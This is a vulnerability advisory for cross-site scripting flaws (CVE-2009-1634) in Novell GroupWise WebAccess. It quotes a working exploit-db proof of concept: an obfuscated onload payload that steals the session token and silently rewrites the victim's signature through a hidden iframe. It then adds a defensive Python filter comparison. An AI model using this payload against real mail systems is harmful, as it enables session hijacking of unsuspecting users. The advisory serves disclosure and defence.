Novell GroupWise WebAccess gw/webacc Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1117812
Vulnerability type: Other
Published: 2009-05-21
Updated: 2009-06-09
CVE: CVE-2009-1634
CNNVD ID: CNNVD-200905-360
Platform: Multiple
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/33007
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-360
|Vulnerability details
Novell GroupWise is a collaborative communications system from Novell (USA). It provides e-mail, calendaring, instant messaging, task management, document management and contact management services. The GroupWise WebAccess login page (https://www.website.com/gw/webacc) does not properly validate the GWAP.version, User.Theme.index and User.lang fields submitted in a login request. A remote attacker can submit a crafted request to perform a cross-site scripting attack, leading to execution of arbitrary code in the user's browser session.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/35066/info

Novell GroupWise WebAccess is prone to multiple security vulnerabilities.

An attacker may leverage these issues to bypass certain security restrictions or conduct cross-site scripting attacks.

Note that some of the issues may be related to BID 35061. We will update this BID as more information emerges.

Versions prior to WebAccess 7.03 HP3 and 8.0.0 HP2 are vulnerable.

The following harmless code uses an onload event handler to bootstrap its payload as soon as the e-mail is opened.

The first stage of the script extracts the session token (User.Context) from the current document's URI and uses it to build the second stage. The second stage injects an iframe into the current page, which in turn calls the signature configuration interface and changes the user's signature on the fly.

This example uses a fake target, 'gwwa.victim.com', which must be changed to a real server address/name.

Here, the security parser does not recognize "onload = 'javascript:..." as potentially unsafe simply because of the space characters around the equals sign.

<!--
    <html>
    <head>
    </head>
        <body onmouseover = 'return false;' onload = 'javascript:var
context=document.location.href;var token=context.replace(/^.+context=([a-z0-9]+).+$/i,"$1");
        var
malwareS1="%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%62%72%2F%3E%3C%62%72%2F%3E%4E%6F%77%20%63%68%65%63%6B%20%79%6F%75%72%20%73%69%67%6E%61%74%75%72%65%20%2E%2E%2E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%77%77%61%2E%76%69%63%74%69%6D%2E%63%6F%6D%2F%67%77%2F%77%65%62%61%63%63%3F%55%73%65%72%2E%63%6F%6E%74%65%78%74%3D";
        var
malwareS2="%26%61%63%74%69%6F%6E%3D%53%69%67%6E%61%74%75%72%65%2E%4D%6F%64%69%66%79%26%6D%65%72%67%65%3D%73%69%67%6E%61%74%75%72%26%53%69%67%6E%61%74%75%72%65%2E%69%73%45%6E%61%62%6C%65%64%3D%65%6E%61%62%6C%65%64%26%53%69%67%6E%61%74%75%72%65%2E%69%73%41%75%74%6F%6D%61%74%69%63%3D%61%75%74%6F%6D%61%74%69%63%26%53%69%67%6E%61%74%75%72%65%2E%73%69%67%6E%61%74%75%72%65%3D%25%32%30%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%25%30%64%25%30%61%25%30%64%25%30%61%30%77%6E%65%64%2E%22%20%77%69%64%74%68%3D%30%70%78%20%68%65%69%67%68%74%3D%30%70%78%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E";
        document.write(unescape(malwareS1)+token+unescape(malwareS2));return false;'>
            <br/>
            <br/><br/>Now check your signature ...
        </body>
    </html>
-->
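As an added illustration (not part of the advisory, the PoC, or Novell's code), the following Python contrasts a naive substring filter, which misses the whitespace variant the PoC relies on, with a tokenizing check that normalizes attribute names before inspecting them. The sample markup is constructed after the PoC's body tag; no server is contacted.

```python
import re
from html.parser import HTMLParser

# Naive check modelled on the behaviour the advisory describes: it looks for
# an "on<event>=" substring, so "onload = '...'" (spaces around '=') slips past.
NAIVE_HANDLER_RE = re.compile(r"\bon[a-z]+=", re.IGNORECASE)


def naive_filter_flags(html: str) -> bool:
    """True if the substring filter would reject this markup."""
    return NAIVE_HANDLER_RE.search(html) is not None


class EventHandlerFinder(HTMLParser):
    """Tokenizes tags and attributes, so whitespace around '=' no longer
    matters: 'onload = x' and 'onload=x' yield the same attribute name."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, value) for every risky attribute

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip()
            # Any on* attribute is an inline event handler.
            if name.startswith("on"):
                self.findings.append((tag, name, value))
            # URL attributes carrying a javascript: scheme are just as risky.
            elif name in ("src", "href") and value.lower().startswith("javascript:"):
                self.findings.append((tag, name, value))

    handle_startendtag = handle_starttag


def parser_flags(html: str):
    """Return the risky attributes a tokenizing check finds in the markup."""
    finder = EventHandlerFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample modelled on the PoC's <body> tag (no real server involved).
SAMPLE = ("<body onmouseover = 'return false;' "
          "onload = 'javascript:var context=document.location.href;'>")

if __name__ == "__main__":
    print("naive filter flags sample:", naive_filter_flags(SAMPLE))  # False
    print("tokenizing check finds:", parser_flags(SAMPLE))
```

The fix the example points at is the same one the vendor patch had to make: decide on the parsed attribute, not on the raw byte pattern.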
|References

Source: MISC
Link: https://bugzilla.novell.com/show_bug.cgi?id=472979
Source: XF
Name: groupwise-session-unauth-access(50688)
Link: http://xforce.iss.net/xforce/xfdb/50688
Source: VUPEN
Name: ADV-2009-1393
Link: http://www.vupen.com/english/advisories/2009/1393
Source: BID
Name: 35066
Link: http://www.securityfocus.com/bid/35066
Source: www.novell.com
Link: http://www.novell.com/support/viewContent.do?externalId=7003266&sliceId=1
Source: SECUNIA
Name: 35177
Link: http://secunia.com/advisories/35177